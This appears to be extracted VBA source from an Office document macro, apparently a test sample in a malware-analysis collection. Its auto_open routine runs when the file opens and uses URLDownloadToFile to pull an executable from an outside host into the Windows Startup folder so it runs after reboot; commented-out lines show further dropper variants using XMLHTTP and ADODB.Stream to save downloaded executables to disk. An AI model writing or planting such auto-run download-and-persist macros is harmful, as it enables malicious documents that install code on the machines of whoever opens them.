Filename     : ./macros/e8364a2f9bdd7fa959f354efaa23793c2c5d273807fb27a9c7cc315ba685e14f
OLE stream   : _VBA_PROJECT_CUR/VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"
'Private Declare Function URLDownloadToFile Lib "urlmon" _
'    Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
'    ByVal szURL As String, ByVal szFileName As String, _
'    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long


    Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileW" (ByVal pCaller As Long, _
        ByVal szURL As Long, _
        ByVal szFileName As Long, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long) As Long

Sub auto_open()
'    Dim myURL As String
'    myURL = "http://10.40.56.3/MA_Samples/notepad.exe"
'
'    Dim WinHttpReq As Object
'    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
'    WinHttpReq.Open "GET", myURL, False
'    WinHttpReq.Send
'
'    myURL = WinHttpReq.ResponseBody
'    If WinHttpReq.Status = 200 Then
'
'        Set oStream = CreateObject("ADODB.Stream")
'        oStream.Open
'        oStream.Type = 1
'        oStream.Write WinHttpReq.ResponseBody
'        strStreamPath = "C:\tmp.exe"
'        oStream.SaveToFile strStreamPath
'        oStream.Close
'    End If
'    Dim a As Long
'    Dim b As Long
'    Dim c As Long
    Dim d As Long
'    c = URLDownloadToFile(&O0, CLng(StrPtr("http://utilzone.topguide.co.kr/update/UZ82/UZU1018.exe")), CLng(StrPtr("C:\\test3.exe")), &O0, &O0)
    d = URLDownloadToFile(&O0, CLng(StrPtr("http://www.7-zip.org/a/7z1800-x64.exe")), CLng(StrPtr("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AUTORUN_AFTER_REBOOT.exe")), &O0, &O0)
'    a = URLDownloadToFile(&O0, CLng(StrPtr("http://w1.loxa.com.tw/s846318/GAME2/picaball.exe")), CLng(StrPtr("C:\test1.exe")), &O0, &O0)
'    b = URLDownloadToFile(&O0, CLng(StrPtr("http://na-us1.disk-tools.com/request?p=b7b3149e8d5bfb243bccb976446d1f1d/DTLite4481-0347.exe")), CLng(StrPtr("C:\\test2.exe")), &O0, &O0)
   
    
'    MsgBox (a)
    MsgBox ("Excel Macro is successfully running!!!")

End Sub
    
